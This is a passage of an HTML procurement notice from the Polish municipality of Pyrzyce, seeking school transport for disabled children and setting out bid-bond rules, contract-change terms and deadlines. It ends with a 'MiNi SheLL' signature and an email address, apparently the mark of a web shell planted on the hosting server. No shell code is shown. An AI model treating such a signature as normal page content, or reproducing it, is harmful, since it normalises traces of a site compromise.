podstaw do<br/>wykluczenia złożyli wymagane oświadczenia / dokumenty do oferty. Na podstawie art. 125 ust. 1<br/>ustawy Pzp w terminie składania ofert każdy z wykonawców składa oświadczenia o braku podstaw do<br/>wykluczenia z postępowania – Załącznik numer 3 do SWZ Zamawiający nie będzie wzywał<br/>wykonawcę, którego oferta zostanie najwyżej oceniona do złożenia podmiotowych środków<br/>dowodowych potwierdzających brak podstaw wykluczenia z postępowania.W przypadku wspólnego<br/>ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 1.4 składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia z postępowania</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>1) Oświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej. Wymienione oświadczenie należy<br/>złożyć w oparciu o zamieszczony na stronie internetowej Zamawiającego https://platformazakupowa.pl/pn/um_pyrzyce wykaz<br/>złożonych w danym postępowaniu ofert, zgodnie ze wzorem zamieszczonym w załączniku Nr 5 do SWZ.<br/>2) Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają<br/>wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 108 ust. 1 Ustawy;<br/>Dokumenty powinny być wystawione nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.<br/>a) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu jak<br/>wyżej, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.<br/>b) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument<br/>dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio<br/>oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której<br/>dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu<br/>zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce<br/>zamieszkania tej osoby.<br/>Dokumenty/oświadczenia powinny być wystawione nie wcześniej niż 3 miesięcy przed upływem składania ofert.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda wniesienia wadium w wysokości 5000,00 zł (pięć tysięcy złotych) w terminie<br/>do dnia 14.12.2023 , do godz. 10:00<br/>2. Wadium może być wniesione w jednej lub kilku formach przewidzianych art. 97 ust 7 Ustawy:<br/>1) pieniądzu,<br/>2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,<br/>z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,<br/>3) gwarancjach bankowych,<br/>4) gwarancjach ubezpieczeniowych,<br/>5) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości tj. (Dz. U. z 2023 r. poz. 462 z późn. zm.).<br/>3. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego:<br/>w BNP PARIBAS nr 07 2030 0045 1110 0000 0112 5470 z adnotacją na blankiecie przelewu: Wadium - „Dowóz dzieci,<br/>uczniów i wychowanków w tym niepełnosprawnych z miejsca zamieszkania znajdującego się na terenie Gminy Pyrzyce do<br/>Niepublicznego Przedszkola Specjalnego „Puchatek” w Pyrzycach, Ośrodka Rehabilitacyjno- Edukacyjno- Wychowawczego<br/>oraz Niepublicznej Szkoły Przysposabiającej do Pracy w Nowielinie, Specjalnego Ośrodka Szkolno–Wychowawczego im.<br/>Jana Brzechwy w Pyrzycach, Zespołu Szkół Specjalnych im. J. Tuwima w Stargardzie, Specjalnego Ośrodka Szkolno-<br/>Wychowawczego ul. Janusza Korczaka w Policach, w roku szkolnym 2023/2024 oraz 2024/2025 i odwożeniu trasą<br/>powrotną po zakończeniu nauki szkolnej”.<br/>4. Wadium wnoszone w formie poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach<br/>udzielonych przez podmiot, o którym mowa w art. 6b ust 5 pkt. 2 ustawy z dnia 2 listopada 2000 r. o utworzeniu Polskiej<br/>Agencji Rozwoju Przedsiębiorczości, należy wnieść w formie nienaruszonego oryginału razem z ofertą w osobnej kopercie.<br/>5. Z treści wadium wnoszonego w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub<br/>poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, powinno wynikać bezwarunkowe, na każde pisemne żądanie<br/>przez Zamawiającego w terminie związanym ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty<br/>wadium, w okolicznościach określonych w art. 98 ust. 5 i 6 Ustawy. Jeśli treść wnoszonego wadium będzie ograniczać w<br/>jakikolwiek sposób bezwarunkowy i na każde pisemne żądanie zgłoszone przez Zamawiającego wypłatę wadium<br/>Zamawiający uzna, że wadium zostało nieskutecznie wniesione.<br/>6. W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja ma być sporządzona zgodnie z<br/>obowiązującym prawem i winna zawierać następujące elementy:<br/>1) nazwę Wykonawcy, beneficjenta gwarancji (Zamawiającego), gwaranta (bank lub instytucji ubezpieczeniowej<br/>udzielających gwarancji) oraz wskazania ich siedziby,<br/>2) oznaczenie postępowania,<br/>3) określenie przedmiotu postępowania,<br/>4) określenie wierzytelności, która ma być zabezpieczona gwarancją,<br/>5) kwotę gwarancji,<br/>6) termin ważności gwarancji.<br/>W przypadku wadium wnoszonego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, jako zobowiązanego należy oznaczyć wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert.<br/>8. Zgodnie z art. 97 ust. 5 ustawy wadium musi być wniesione przed upływem terminu składania ofert.<br/>9. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunek bankowy<br/>Zamawiającego.<br/>10. Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium w zaznaczonym terminie,<br/>zostanie wykluczony z postępowania a jego oferta zostanie odrzucona.<br/>12. Pozostałe zasady dotyczące wadium określa art. 97 i 98 Ustawy.<br/>Szczegółowe informacje dotyczące wadium zawiera Rozdział V SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wzór umowy stanowi załącznik nr 4 do SWZ.<br/>2. Umowa zostanie zawarta w formie pisemnej:<br/>1) w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zostało ono<br/>przesłane faksem lub drogą elektroniczną, lub<br/>2) w terminie nie krótszym niż 10 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zostało<br/>ono przesłane pisemnie,<br/>3) w przypadku gdy, w postępowaniu złożona została tylko jedna oferta lub nie odrzucono żadnej oferty oraz nie wykluczono<br/>żadnego Wykonawcy, możliwe jest zawarcie umowy przed upływem ww. terminów.<br/>3. O miejscu i terminie podpisania umowy Zamawiający powiadomi wybranego Wykonawcę.<br/>4. W przypadku, gdy okaże się, że Wykonawca, którego oferta została wybrana będzie uchylał się od zawarcia umowy lub<br/>nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, Zamawiający może wybrać ofertę najkorzystniejszą<br/>spośród pozostałych ofert, bez przeprowadzania ich ponownej oceny, chyba, że zachodzi jedna z przesłanek unieważnienia<br/>postępowania.<br/>5. Zakazuje się zmian istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano<br/>wyboru Wykonawcy, chyba że zachodzi co najmniej jedna<br/>z następujących okoliczności:<br/>1) zmiany dotyczą realizacji dodatkowych usług od dotychczasowego Wykonawcy, nieobjętych zamówieniem<br/>podstawowym, o ile stały się niezbędne do zrealizowania zamówienia:<br/>a) nastąpiła zmiana tras dowozów i odwozów uczniów,<br/>b) nastąpiła istotna zmiana w liczbie dowożonych uczniów,<br/>c) nastąpiła konieczność wykonywania dodatkowych kursów autobusowych.<br/>6. Zmianę postanowień zawartych w umowie uznaje się za istotną, jeżeli:<br/>1) zmienia ogólny charakter umowy, w stosunku do charakteru umowy w pierwotnym brzmieniu,<br/>2) nie zmienia ogólnego charakteru umowy i zachodzi co najmniej jedna z następujących okoliczności:<br/>a) zmiana wprowadza warunki, które gdyby były postawione w postępowaniu o udzielenie zamówienia, to w tym<br/>postępowaniu wzięliby lub mogliby wziąć udział inni Wykonawcy lub przyjęto by oferty innej treści,<br/>b) zmiana narusza równowagę ekonomiczną umowy na korzyść Wykonawcy w sposób nieprzewidziany pierwotnie w<br/>umowie,<br/>c) zmiana znacznie rozszerza lub zmniejsza zakres świadczeń i zobowiązań wynikający z umowy,<br/>d) polega na zastąpieniu Wykonawcy, któremu Zamawiający udzielił zamówienia, nowym Wykonawcą, w przypadkach<br/>innych niż określone w umowie lub Ustawie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem formularza na Platformie na stronie postępowania, znajdującej się pod adresem wskazanym na stronie internetowej https://platformazakupowa.pl/pn/um_pyrzyce/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-14 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com